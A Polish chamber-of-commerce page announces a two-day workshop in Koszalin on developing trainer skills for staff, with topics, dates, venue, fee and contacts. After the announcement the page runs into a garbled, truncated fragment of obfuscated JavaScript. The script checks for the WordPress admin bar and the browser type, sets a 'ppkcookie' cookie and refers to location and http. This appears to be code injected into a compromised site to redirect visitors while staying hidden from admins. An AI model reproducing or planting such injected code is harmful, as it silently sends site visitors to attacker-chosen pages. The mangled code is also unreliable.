Zarządzanie personelem – ROZWÓJ UMIEJĘTNOŚCI TRENERSKICH- warsztaty | Północna Izba Gospodarcza w Koszalinie

Kompetencje trenerskie są bardzo przydatne w każdej firmie, w której kierownictwo stawia na rozwój i kształcenie umiejętności personelu w zakresie wykonywania obowiązków służbowych. Osoby prowadzące szkolenia wewnętrzne nie zawsze posiadają wykształcenie pedagogiczne, dlatego zachęcamy do wzięcia udziału w naszym szkoleniu, gdzie uczestnik będzie umiał przekazać wiadomości i kształtować umiejętności członków zespołu pracowniczego stosując metody dydaktyczne, techniki i narzędzia w pracy trenera/szkoleniowca.

Podczas warsztatu uczestnik dowie się m.in.:

  • jak przekazywać wiedzę zawodową członkom zespołu i jak rozwijać ich umiejętności w zakresie realizacji zadań;
  • jakie narzędzia aktywnego słuchania wykorzystać aby przekaz był skuteczny;
  • jak wykorzystywać metody i narzędzia związane z właściwym doborem stylu komunikacji społecznej aby usprawnić proces przekazu i odbioru informacji;
  • jak formalnie i praktycznie przygotować i prowadzić szkolenie/instruktaż.

W trakcie warsztatu uczestnik uświadomi sobie także jaki wpływ ma na niego subiektywność percepcji społecznej w odniesieniu do postrzegania różnorodności u członków zespołu. Poza tym pozna dominujące systemy reprezentacji sensorycznej sprzyjające dostosowaniu właściwego kanału przekazywania wiedzy. Także w oparciu o model D. Kolba dowie się na czym polega uczenie się przez doświadczanie dorosłych i jak to przełożyć na prowadzenie instruktażu dla kadry pracowniczej. Uczestnik poza aktywnym udziałem w szkoleniu, samodzielnie będzie miał za zadanie przygotować prezentację szkolenia z obszaru swojej działalności w formie multimedialnej lub flipchartów.

Termin warsztatów: 8 maja ( I część) i 22 maja (II część)

Czas trwania: 2 dni * 5 h

Miejsce warsztatów: Koszalin – Spektrum szkolenia doradztwo coaching Mieszka I 30 lok. 303 (ostatnie piętro) Koszalin

Szkolenie poprowadzi Elżbieta Nell Chojnowska z firmy Spektrum (www.spektrum-szkolenia.pl)

Koszt uczestnictwa w warsztatach wynosi 350 zł  (wystawiana jest faktura).

Potwierdzenie obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie do naszego biura 94 341 10 83. 

Liczba miejsc ograniczona! 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m